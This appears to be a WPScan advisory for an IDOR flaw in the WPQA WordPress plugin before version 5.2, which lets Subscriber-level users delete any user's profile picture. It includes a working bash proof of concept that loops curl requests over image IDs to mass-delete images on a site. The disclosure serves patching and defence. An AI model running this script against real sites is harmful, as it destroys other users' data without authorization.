WordPress Plugin Vulnerabilities
WPQA < 5.2 - Subscriber+ Arbitrary Profile Picture Deletion via IDOR
Description
The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the ajax action wpqa_remove_image belongs to the requesting user, allowing any users (with privileges as low as Subscriber) to delete the profile pictures of any other user.
Proof of Concept
#!/bin/bash
nonce=aae369a8e3
for i in {1..100000};
do
curl 'https://vulnerable.website/wp-admin/admin-ajax.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: something=something' --data-raw 'action=wpqa_remove_image&wpqa_remove_image='$nonce'&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id='$i;
done
Affects Plugins
Fixed in 5.2 References
CVE
Classification
Type
AUTHBYPASS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Binit Ghimire
Submitter
Binit Ghimire
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-04-21 (about 2 years ago)
Added
2022-04-21 (about 2 years ago)
Last Updated
2022-04-22 (about 2 years ago)
WPScan 